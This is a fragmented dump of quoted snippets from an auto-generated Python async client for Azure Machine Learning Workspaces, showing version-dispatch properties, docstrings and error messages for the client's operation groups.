:param credential: Credential needed for the client to", "operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends", "import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as", ") -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)", "{} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "== '1.5.0': from ..dataset_dataplane import models return models elif api_version == '1.0.0': from", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01':", "'1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does", "the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: 
:class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\"", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise", "on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version", "..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version))", "Stack, Azure Government, Azure China, etc.). 
By default, it uses the latest API", "* 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version ==", "_models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)}", "Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>`", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from", "depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version", "API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if", "version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: 
:class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview:", "* 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API", "return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def", "*args, **kwargs): \"\"\"This is a fake class to support current implemetation of MultiApiClientMixin.\"", "= self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API version:", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version: *", "from ..model_dataplane import models return models elif api_version == 'v1.0': from ..registry_discovery import", "The api-version parameter sets the default API version if the operation group is", "'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }},", ":class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = 
self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from", "API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01:", "2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01':", "time between two polls for LRO operations if no Retry-After header is present.", "@property def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\"", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version ==", "== 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {}", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif", "group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on", "operation group 
'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends", "Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt", "Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>`", "* 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version ==", "'2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "def assets(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version", "ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version ==", "JobsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "else: raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client,", 
":class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations", "\"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on", "not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self):", "get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version =", "def delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0:", "import models return models elif api_version == 'v1.0': from ..runhistory import models return", "'2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version ==", "Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>`", "as OperationClass elif api_version == '2022-02-01-preview': from 
..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif", "'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the", "\"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as", "UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..model_dataplane import models return models elif api_version == 'v1.0': from ..registry_discovery import models", "does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>`", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version ==", "v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import", "from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not", "if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version:", "import RunArtifactsOperations as OperationClass else: 
raise ValueError(\"API version {} does not have operation", "api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass", ":class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version", "..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version", "2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import 
BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview':", "import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as", "events(self): \"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version =", "'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API", "version {} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview':", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version ==", "users to operate on Azure Machine Learning Workspace resources. 
This ready contains multiple", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from", "\"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as", "\"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as", "1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version", "API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview':", "'2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does", "ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "Government, Azure China, etc.). 
By default, it uses the latest API version available", "ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass", "version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "\" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] =", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else:", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01':", "on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version", "raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import", "operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends", ":param base_url: Service URL :type base_url: str :param profile: A profile definition, from", "on the API version: * 2020-09-01-dataplanepreview: 
:class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version", "DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from", "it uses the latest API version available on public Azure. For production, you", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version ==", "\"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as", "the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\"", "== 'v1.0': from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview': from", "EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version: * 
2021-10-01:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API", "self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise", "# Licensed under the MIT License. See License.txt in the project root for", "self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version", "version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version =", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else:", "def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview:", "== '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the 
API", "Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>`", "'2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version {} is not", "not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self):", "* 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version ==", "subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles =", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: *", "operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API version:", "2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: 
:class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01':", "== '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {}", "does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version =", "ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "with all of the Azure clouds (Azure Stack, Azure Government, Azure China, etc.).", "on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version", "Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>`", "the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: 
:class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\"", "operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends", "import RunsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import", "operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends", "{} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else:", "version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from", "self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations 
import RegistryManagementNonWorkspaceOperations as OperationClass else: raise", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version))", "if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API", "api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version", "@property def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` *", "import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as", "'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version: *", "def __init__(self, *args, **kwargs): \"\"\"This is a fake class to support current implemetation", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API", "by Microsoft (R) AutoRest Code Generator. 
# Changes may cause incorrect behavior and", "..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise", "have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API", "API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if", "self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version", "self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version", "depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') 
